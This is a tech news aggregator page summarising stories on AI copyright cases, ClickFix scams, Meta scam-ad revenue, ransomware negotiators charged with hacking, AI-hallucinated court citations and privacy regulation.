The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Piracy

Amazon Steps Up Attempts To Block Illegal Sports Streaming Via Fire TV Sticks (nytimes.com) 27

Amazon is rolling out a tougher approach to combat illegal streaming, with the United States-based tech company aiming to block apps loaded onto all its Fire TV Stick devices that are identified as providing pirated content. From a report: Exclusive data provided to The Athletic from researchers YouGov Sport highlighted that approximately 4.7 million UK adults watched illegal streams in the UK over the past six months, with 31% using Fire Stick (this has become a catch-all term for plug-in devices, even if not made by Amazon) and other IPTV (Internet Protocol Television) devices. It is now the second-most popular method behind websites (42%).

Amazon launched a new Fire TV Stick last month -- the 4K Select, which is plugged into a TV to facilitate streaming via the internet -- that it insists will be less of a breeding ground for piracy. It comprises enhanced security measures -- via a new Vega operating system -- and only apps available in Amazon's app store will be available for customers to download. Amazon insists the clampdown will apply to the new and old devices, but registered developers will still be able to use Fire Sticks for legitimate purposes.

Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executive. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
The Courts

OpenAI Used Song Lyrics In Violation of Copyright Laws, German Court Says (reuters.com) 66

A Munich court ruled that OpenAI violated German copyright law by training its models on lyrics from nine songs and allowing ChatGPT to reproduce them. OpenAI now faces damages as it considers an appeal. Reuters reports: The regional court in Munich found that the company trained its AI on protected content from nine German songs, including Groenemeyer's hits "Maenner" and "Bochum." The case was brought by German music rights society GEMA, whose members include composers, lyricists and publishers, in another sign of artists around the world fighting back against data scraping by AI.

Presiding judge Elke Schwager ordered OpenAI to pay damages for the use of copyrighted material, without disclosing a figure. GEMA legal advisor Kai Welp said GEMA hoped discussions could now take place with OpenAI on how copyright holders can be remunerated. OpenAI had argued that its language models did not store or copy specific training data but, rather, reflected what they had learned based on the entire training data set.

Since the output would only be generated as a result of user inputs known as prompts, it was not the defendants, but the respective user who would be liable for it, OpenAI had argued. However, the court found that both the memorization in the language models and the reproduction of the song lyrics in the chatbot's outputs constitute infringements of copyright exploitation rights, according to a statement on the ruling.

United States

US Senator Challenges Defense Industry on Right-to-Repair Opposition (reuters.com) 47

Democratic U.S. Senator Elizabeth Warren is escalating pressure on the defense industry to stop opposing military right-to-repair legislation, as House and Senate negotiators work to finalize the fiscal 2026 National Defense Authorization Act. From a report: In a sharply-worded November 5 letter to the National Defense Industrial Association (NDIA) obtained by Reuters, Warren accused the industry group of attempting to undermine bipartisan efforts to give the Pentagon greater ability to repair weapons and equipment it owns.

She called the group's opposition "a dangerous and misguided attempt to protect an unacceptable status quo of giant contractor profiteering." Currently, the government is often required to pay contractors like NDIA members Lockheed Martin, Boeing and RTX to use expensive original equipment and installers to service broken parts, versus having trained military maintainers 3D print spares in the field and install them faster and more cheaply.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU antitrust chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
AI

'AI Slop' in Court Filings: Lawyers Keep Citing Fake AI-Hallucinated Cases (indianexpress.com) 135

"According to court filings and interviews with lawyers and scholars, the legal profession in recent months has increasingly become a hotbed for AI blunders," reports the New York Times: Earlier this year, a lawyer filed a motion in a Texas bankruptcy court that cited a 1985 case called Brasher v. Stewart. Only the case doesn't exist. Artificial intelligence had concocted that citation, along with 31 others. A judge blasted the lawyer in an opinion, referring him to the state bar's disciplinary committee and mandating six hours of A.I. training.

That filing was spotted by Robert Freund, a Los Angeles-based lawyer, who fed it to an online database that tracks legal A.I. misuse globally. Mr. Freund is part of a growing network of lawyers who track down A.I. abuses committed by their peers, collecting the most egregious examples and posting them online. The group hopes that by tracking down the A.I. slop, it can help draw attention to the problem and put an end to it... [C]ourts are starting to map out punishments of small fines and other discipline. The problem, though, keeps getting worse. That's why Damien Charlotin, a lawyer and researcher in France, started an online database in April to track it.

Initially he found three or four examples a month. Now he often receives that many in a day. Many lawyers... have helped him document 509 cases so far. They use legal tools like LexisNexis for notifications on keywords like "artificial intelligence," "fabricated cases" and "nonexistent cases." Some of the filings include fake quotes from real cases, or cite real cases that are irrelevant to their arguments. The legal vigilantes uncover them by finding judges' opinions scolding lawyers...

Court-ordered penalties "are not having a deterrent effect," said Freund, who has publicly flagged more than four dozen examples this year. "The proof is that it continues to happen."

Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters , Google Search Console.

Though it normally shows the short phrases or keywords typed into Google which led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries — including "some pretty crazy ones." (Web optimization consultant Slobodan ManiÄ helped Packer investigate...) Packer points out "nobody clicked share" or were given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console.."
Facebook

Bombshell Report Exposes How Meta Relied On Scam Ad Profits To Fund AI (reuters.com) 59

"Internal documents have revealed that Meta has projected it earns billions from ignoring scam ads that its platforms then targeted to users most likely to click on them," writes Ars Technica, citing a lengthy report from Reuters.

Reuters reports that Meta "for at least three years failed to identify and stop an avalanche of ads that exposed Facebook, Instagram and WhatsApp's billions of users to fraudulent e-commerce and investment schemes, illegal online casinos, and the sale of banned medical products..." On average, one December 2024 document notes, the company shows its platforms' users an estimated 15 billion "higher risk" scam advertisements — those that show clear signs of being fraudulent — every day. Meta earns about $7 billion in annualized revenue from this category of scam ads each year, another late 2024 document states. Much of the fraud came from marketers acting suspiciously enough to be flagged by Meta's internal warning systems.

But the company only bans advertisers if its automated systems predict the marketers are at least 95% certain to be committing fraud, the documents show. If the company is less certain — but still believes the advertiser is a likely scammer — Meta charges higher ad rates as a penalty, according to the documents. The idea is to dissuade suspect advertisers from placing ads. The documents further note that users who click on scam ads are likely to see more of them because of Meta's ad-personalization system, which tries to deliver ads based on a user's interests... The documents indicate that Meta's own research suggests its products have become a pillar of the global fraud economy. A May 2025 presentation by its safety staff estimated that the company's platforms were involved in a third of all successful scams in the U.S.

Meta also acknowledged in other internal documents that some of its main competitors were doing a better job at weeding out fraud on their platforms... The documents note that Meta plans to try to cut the share of Facebook and Instagram revenue derived from scam ads. In the meantime, Meta has internally acknowledged that regulatory fines for scam ads are certain, and anticipates penalties of up to $1 billion, according to one internal document. But those fines would be much smaller than Meta's revenue from scam ads, a separate document from November 2024 states. Every six months, Meta earns $3.5 billion from just the portion of scam ads that "present higher legal risk," the document says, such as those falsely claiming to represent a consumer brand or public figure or demonstrating other signs of deceit. That figure almost certainly exceeds "the cost of any regulatory settlement involving scam ads...."

A planning document for the first half of 2023 notes that everyone who worked on the team handling advertiser concerns about brand-rights issues had been laid off. The company was also devoting resources so heavily to virtual reality and AI that safety staffers were ordered to restrict their use of Meta's computing resources. They were instructed merely to "keep the lights on...." Meta also was ignoring the vast majority of user reports of scams, a document from 2023 indicates. By that year, safety staffers estimated that Facebook and Instagram users each week were filing about 100,000 valid reports of fraudsters messaging them, the document says. But Meta ignored or incorrectly rejected 96% of them. Meta's safety staff resolved to do better. In the future, the company hoped to dismiss no more than 75% of valid scam reports, according to another 2023 document.

A small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it, a 2024 document states. Some bigger spenders — known as "High Value Accounts" — could accrue more than 500 strikes without Meta shutting them down, other documents say.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.
The Courts

Texas Sues Roblox For Allegedly Failing To Protect Children On Its Platform (theverge.com) 45

Texas is suing Roblox, alleging the company misled parents about safety, ignored online-protection laws, and allowed an environment where predators could target children. Texas AG Ken Paxton said the online game platform is "putting pixel pedophiles and profits over the safety of Texas children," alleging that it is "flagrantly ignoring state and federal online safety laws while deceiving parents about the dangers of its platform." The Verge reports: The lawsuit's examples focus on instances of children who have been abused by predators they met via Roblox, and the activities of groups like 764 which have used online platforms to identify and blackmail victims into sexually explicit acts or self harm. According to the suit, Roblox's parental controls push only began after a number of lawsuits, and a report released last fall by the short seller Hindenburg that said its "in-game research revealed an X-rated pedophile hellscape, exposing children to grooming, pornography, violent content and extremely abusive speech." Eric Porterfield, Senior Director of Policy Communications at Roblox, said in a statement: "We are disappointed that, rather than working collaboratively with Roblox on this industry-wide challenge and seeking real solutions, the AG has chosen to file a lawsuit based on misrepresentations and sensationalized claims." He added, "We have introduced over 145 safety measures on the platform this year alone."
Social Networks

Denmark's Government Aims To Ban Access To Social Media For Children Under 15 (apnews.com) 35

An anonymous reader quotes a report from the Associated Press: Denmark's government on Friday announced an agreement to ban access to social media for anyone under 15, ratcheting up pressure on Big Tech platforms as concerns grow that kids are getting too swept up in a digitized world of harmful content and commercial interests. The move would give some parents -- after a specific assessment -- the right to let their children access social media from age 13.

It wasn't immediately clear how such a ban would be enforced: Many tech platforms already restrict pre-teens from signing up. Officials and experts say such restrictions don't always work. Such a measure would be among the most sweeping steps yet by a European Union government to limit use of social media among teens and younger children, which has drawn concerns in many parts of an increasingly online world.
"We've given the tech giants so many chances to stand up and to do something about what is happening on their platforms. They haven't done it," said Caroline Stage, Denmark's minister for digital affairs. "So now we will take over the steering wheel and make sure that our children's futures are safe."

"I can assure you that Denmark will hurry, but we won't do it too quickly because we need to make sure that the regulation is right and that there is no loopholes for the tech giants to go through," Stage said.
Security

US Congressional Budget Office Hit By Suspected Foreign Cyberattack (bleepingcomputer.com) 26

An anonymous reader quotes a report from BleepingComputer: The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer.

"The incident is being investigated and work for the Congress continues. Like other government agencies and private sector entities, CBO occasionally faces threats to its network and continually monitors to address those threats." The Washington Post first reported the breach, stating that officials discovered the hack in recent days and are now concerned that emails and exchanges between congressional offices and the CBO's analysts may have been exposed. While officials have reported told lawmakers they believe the intrusion was detected early, some congressional office have allegedly halted emails with the CBO out of security concerns.

The Courts

Why Sam Altman Was Booted From OpenAI, According To New Testimony (theverge.com) 38

An anonymous reader quotes a report from The Verge: What did Ilya see?" Two years ago, it was the meme seen 'round the world (or at least 'round the tech industry). OpenAI CEO Sam Altman had been briefly ousted in November 2023 by members of the company's board of directors, including his longtime collaborator and fellow cofounder Ilya Sutskever. The board claimed Altman "was not consistently candid in his communications with the board," undermining their confidence in him. He was out for less than a week before being reinstated after hundreds of employees threatened to resign. But observers wondered: What hadn't Altman been candid about? And what led Sutskever to turn against him?

Now, new details have come to light in a legal deposition involving Sutskever, part of Musk's ongoing lawsuit against Altman and OpenAI. For nearly 10 hours on October 1st, bookended by repeated sniping between Musk's and Sutsever's attorneys, Sutskever answered questions about the turmoil around Altman's ouster, from conflicts between executives to short-lived merger talks with Anthropic. He testified that from personal experience and documentation he'd viewed, he'd seen Altman pit high-ranking executives against each other and offer conflicting information about his plans for the company, telling people what they wanted to hear.

The testimony paints a picture of a leader who could be manipulative and chameleon-like in the relentless pursuit of his own agenda -- though Sutskever expressed hesitation about his reliance on some of the secondhand accounts later in testimony, saying he "learned the critical importance of firsthand knowledge for matters like this." In a statement toThe Verge, OpenAI spokesperson Liz Bourgeois said that "The events of 2023 are behind us. These claims were fully examined during the board's independent review, which unanimously concluded Sam and Greg are the right leaders for OpenAI." The comment echoes a 2024 statement by board chair Bret Taylor, following an investigation conducted by the company.
Altman "exhibits a consistent pattern of lying, undermining his execs, and pitting his execs against one another," reads a quote from the memo Sutskever. Altman told him and Jakub Pachocki, who is now OpenAI's chief scientist, "conflicting things about the way the company would be run," leading to internal conflict and repeated undermining.

Sutskever said he also faulted Altman for "not accepting or rejecting" former OpenAI research executive Dario Amodei Dario's conditions when he wanted to run all research and fire OpenAI president Greg Brockman, implying Altman played both sides.

Furthermore, OpenAI CTO Mira Murati surfaced claims that Altman left Y Combinator for "similar behaviors. He was creating chaos, starting lots of new projects, pitting people against each other, and thus was not managing YC well."
Piracy

Cloudflare Tells US Govt That Foreign Site Blocking Efforts Are Digital Trade Barriers (torrentfreak.com) 12

An anonymous reader quotes a report from TorrentFreak: In a submission for the 2026 National Trade Estimate Report (PDF), Cloudflare warns the U.S. government that site blocking efforts cause widespread disruption to legitimate services. The complaint points to Italy's automated Piracy Shield system, which reportedly blocked "tens of thousands" of legitimate sites. Meanwhile, overbroad IP address blocks in Spain and new automated blocking proposals in France are serious concerns that harm U.S. business interests, Cloudflare reports. [...]

Cloudflare urges the USTR to take these concerns into account for its upcoming National Trade Estimate Report. Ideally, it wants these trade barriers to be dismantled. These calls run counter to requests from rightsholders, who urge the USTR to ensure that more foreign countries implement blocking measures. With potential site-blocking legislation being considered in U.S. Congress, that may impact local lobbying efforts as well. If and how the USTR will address these concerns will become clearer early next year, when the 2026 National Trade Estimate Report is expected to be published.

Privacy

The Louvre's Video Surveillance Password Was 'Louvre' (pcgamer.com) 90

A bungled October 18 heist that saw $102 million of crown jewels stolen from the Louvre in broad daylight has exposed years of lax security at the national art museum. From trivial passwords like 'LOUVRE' to decades-old, unsupported systems and easy rooftop access, the job was made surprisingly easy. PC Gamer reports: As Rogue cofounder and former Polygon arch-jester Cass Marshall notes on Bluesky, we owe a lot of videogame designers an apology. We've spent years dunking on the emptyheadedness of game characters leaving their crucial security codes and vault combinations in the open for anyone to read, all while the Louvre has been using the password "Louvre" for its video surveillance servers. That's not an exaggeration. Confidential documents reviewed by Liberation detail a long history of Louvre security vulnerabilities, dating back to a 2014 cybersecurity audit performed by the French Cybersecurity Agency (ANSSI) at the museum's request. ANSSI experts were able to infiltrate the Louvre's security network to manipulate video surveillance and modify badge access.

"How did the experts manage to infiltrate the network? Primarily due to the weakness of certain passwords which the French National Cybersecurity Agency (ANSSI) politely describes as 'trivial,'" writes Liberation's Brice Le Borgne via machine translation. "Type 'LOUVRE' to access a server managing the museum's video surveillance, or 'THALES' to access one of the software programs published by... Thales." The museum sought another audit from France's National Institute for Advanced Studies in Security and Justice in 2015. Concluded two years later, the audit's 40 pages of recommendations described "serious shortcomings," "poorly managed" visitor flow, rooftops that are easily accessible during construction work, and outdated and malfunctioning security systems. Later documents indicate that, in 2025, the Louvre was still using security software purchased in 2003 that is no longer supported by its developer, running on hardware using Windows Server 2003.

Piracy

Google Removed 749 Million Anna's Archive URLs From Its Search Results (torrentfreak.com) 38

Google has delisted over 749 million URLs from Anna's Archive, a shadow library and meta-search engine for pirated books, representing 5% of all copyright takedown requests ever filed with the company. TorrentFreak reports: Google's transparency report reveals that rightsholders asked Google to remove 784 million URLs, divided over the three main Anna's Archive domains. A small number were rejected, mainly because Google didn't index the reported links, resulting in 749 million confirmed removals. The comparison to sites such as The Pirate Bay isn't fair, as Anna's Archive has many more pages in its archive and uses multiple country-specific subdomains. This means that there's simply more content to take down. That said, in terms of takedown activity, the site's three domain names clearly dwarf all pirate competition.

Since Google published its first transparency report in May 2012, rightsholders have flagged 15.1 billion allegedly infringing URLs. That's a staggering number, but the fact that 5% of the total targeted Anna's Archive URLs is remarkable. Penguin Random House and John Wiley & Sons are the most active publishers targeting the site, but they are certainly not alone. According to Google data, more than 1,000 authors or publishers have sent DMCA notices targeting Anna's Archive domains. Yet, there appears to be no end in sight. Rightsholders are reporting roughly 10 million new URLs per week for the popular piracy library, so there is no shortage of content to report.

Privacy

Data Breach At Major Swedish Software Supplier Impacts 1.5 Million (bleepingcomputer.com) 6

A massive cyberattack on Swedish IT supplier Miljodata exposed personal data from up to 1.5 million citizens, prompting a national privacy investigation and scrutiny into security failures across multiple municipalities. BleepingComputer reports: MiljÃdata is an IT systems supplier for roughly 80% of Sweden's municipalities. The company disclosed the incident on August 25, saying that the attackers stole data and demanded 1.5 Bitcoin to not leak it. The attack caused operational disruptions that affected citizens in multiple regions in the country, including Halland, Gotland, Skelleftea, Kalmar, Karlstad, and Monsteras.

Because of the large impact, the state monitored the situation from the time of disclosure, with CERT-SE and the police starting to investigate immediately. According to IMY, the attacker exposed on the dark web data that corresponds to 1.5 million people in the country, creating the basis for investigating potential General Data Protection Regulation (GDPR) violations. [...] Although no ransomware groups had claimed the attack when Miljodata disclosed the incident, BleepingComputer found that the threat group Datacarry posted the stolen data on its dark web portal on September 13.
The leaked database has been added to Have I Been Pwned, which contains information such as names, email addresses, physical addresses, phone numbers, government IDs, and dates of birth.
Crime

Ex-Cybersecurity Staff Charged With Moonlighting as Hackers (msn.com) 10

Three employees at cybersecurity companies spent years moonlighting as criminal hackers, launching their own ransomware attacks in a plot to extort millions of dollars from victims around the country, US prosecutors alleged in court filings. From a report: Ryan Clifford Goldberg, a former incident response supervisor at Sygnia Consulting, and Kevin Tyler Martin, who was a ransomware negotiator for DigitalMint, were charged with working together to hack five businesses starting in May 2023. In one instance, they, along with a third person, received a ransom payment of nearly $1.3 million worth of cryptocurrency from a medical device company based in Tampa, Florida, according to prosecutors.

The trio worked in a part of the cybersecurity industry that has sprung up to help companies negotiate with hackers to unfreeze their computer networks -- sometimes by paying ransom. They are also accused of sharing their illicit profits with the developers of the type of ransomware they allegedly used on their victims. DigitalMint informed some customers about the charges last week, according to a document seen by Bloomberg News.

The other person who was allegedly involved in the scheme was also a ransomware negotiator at the same firm as Martin but wasn't charged, according to court records. The person wasn't identified in court records, nor were the companies that were the defendants' former employers. Sygnia confirmed Goldberg had worked there. Martin last year gave a talk at a law school, which listed him as an employee of DigitalMint.

Crime

DOJ Accuses US Ransomware Negotiators of Launching Their Own Ransomware Attacks (techcrunch.com) 20

An anonymous reader quotes a report from TechCrunch: U.S. prosecutors have charged two rogue employees of a cybersecurity company that specializes in negotiating ransom payments to hackers on behalf of their victims with carrying out ransomware attacks of their own. Last month, the Department of Justice indicted Kevin Tyler Martin and another unnamed employee, who both worked as ransomware negotiators at DigitalMint, with three counts of computer hacking and extortion related to a series of attempted ransomware attacks against at least five U.S.-based companies.

Prosecutors also charged a third individual, Ryan Clifford Goldberg, a former incident response manager at cybersecurity giant Sygnia, as part of the scheme. The three are accused of hacking into companies, stealing their sensitive data, and deploying ransomware developed by the ALPHV/BlackCat group. [...] According to an FBI affidavit filed in September, the rogue employees received more than $1.2 million in ransom payments from one victim, a medical device maker in Florida. They also targeted several other companies, including a Virginia-based drone maker and a Maryland-headquartered pharmaceutical company.

Australia

Australians To Get At Least Three Hours a Day of Free Solar Power - Even If They Don't Have Solar Panels (theguardian.com) 62

Australia's new "solar sharer" program will give households in NSW, south-east Queensland, and South Australia at least three hours of free solar power each day starting in 2026 -- even for those without rooftop panels. Other areas will potentially follow in 2027. The Guardian reports: The government said Australians could schedule appliances such as washing machines, dishwashers and air conditioners and charge electric vehicles and household batteries during this time. The solar sharer scheme would be implemented through a change to the default market offer that sets the maximum price retailers can charge customers for electricity in parts of the country. The climate change and energy minister, Chris Bowen, said the program would ensure "every last ray of sunshine was powering our homes" instead of some solar energy being wasted.

Australians have installed more than 4m solar systems and there is regularly cheap excess generation in the middle of the day. Part of the rationale for the program is that it could shift demand for electricity from peak times -- particularly early in the evening -- to when it is sunniest. This could help minimize peak electricity prices and reduce the need for network upgrades and intervention to ensure the power grid was stable.

The Courts

Spotify Sued Over 'Billions' of Fraudulent Drake Streams (consequence.net) 32

A new class-action lawsuit accuses Spotify of allowing billions of fraudulent Drake streams generated by bots between 2022 and 2025, allegedly inflating his royalties at the expense of other artists. "Spotify pays streaming royalties using a 'pro-rata' model based on an artist's market share," notes Consequence. "Each month, revenue from subscriptions and ads is collected into a single, fixed 'pot' of money, which is then distributed to rights holders based on their percentage of the platform's total streams. Because this pot is fixed, an artist who artificially inflates their numbers through bots would dilute the value of every legitimate stream. This allows them to take a larger share of the pot than they earned, effectively siphoning royalties that should have gone to other artists." From the report: According to Rolling Stone, the lawsuit alleges bot use is a widespread problem on Spotify. However, Drake is the only example named, based on "voluminous information" which the company "knows or should know" that proves a "substantial, non-trivial percentage" of his approximately 37 billion streams were "inauthentic and appeared to be the work of a sprawling network of Bot Accounts."

The complaint claims this alleged fraudulent activity took place between "January 2022 and September 2025," with an examination of "abnormal VPN usage" revealing at least 250,000 streams of Drake's song "No Face" during a four-day period in 2024 were actually from Turkey "but were falsely geomapped through the coordinated use of VPNs to the United Kingdom in [an] attempt to obscure their origins." Other notable allegations in the lawsuit are that "a large percentage" of accounts were concentrated in areas where the population could not support such a high volume of streams, including those with "zero residential addresses." The suit also points to "significant and irregular uptick months" for Drake's songs long after their release, as well as a "slower and less dramatic" downtick in streams compared to other artists.

Noting a "staggering and irregular" streaming of Drake's music by individuals, the suit also claims there are a "massive amount of accounts" listening to his songs "23 hours a day." Less than 2% of those users account for "roughly 15 percent" of his streams. "Drake's music accumulated far higher total streams compared to other highly streamed artists, even though those artists had far more 'users' than Drake," the lawsuit concludes.

Google

Google Removes Gemma Models From AI Studio After GOP Senator's Complaint (arstechnica.com) 49

An anonymous reader quotes a report from Ars Technica: You may be disappointed if you go looking for Google's open Gemma AI model in AI Studio today. Google announced late on Friday that it was pulling Gemma from the platform, but it was vague about the reasoning. The abrupt change appears to be tied to a letter from Sen. Marsha Blackburn (R-Tenn.), who claims the Gemma model generated false accusations of sexual misconduct against her.

Blackburn published her letter to Google CEO Sundar Pichai on Friday, just hours before the company announced the change to Gemma availability. She demanded Google explain how the model could fail in this way, tying the situation to ongoing hearings that accuse Google and others of creating bots that defame conservatives. At the hearing, Google's Markham Erickson explained that AI hallucinations are a widespread and known issue in generative AI, and Google does the best it can to mitigate the impact of such mistakes. Although no AI firm has managed to eliminate hallucinations, Google's Gemini for Home has been particularly hallucination-happy in our testing.

The letter claims that Blackburn became aware that Gemma was producing false claims against her following the hearing. When asked, "Has Marsha Blackburn been accused of rape?" Gemma allegedly hallucinated a drug-fueled affair with a state trooper that involved "non-consensual acts." Blackburn goes on to express surprise that an AI model would simply "generate fake links to fabricated news articles." However, this is par for the course with AI hallucinations, which are relatively easy to find when you go prompting for them. AI Studio, where Gemma was most accessible, also includes tools to tweak the model's behaviors that could make it more likely to spew falsehoods. Someone asked a leading question of Gemma, and it took the bait.

Privacy

Manufacturer Remotely Bricks Smart Vacuum After Its Owner Blocked It From Collecting Data (tomshardware.com) 123

"An engineer got curious about how his iLife A11 smart vacuum worked and monitored the network traffic coming from the device," writes Tom's Hardware.

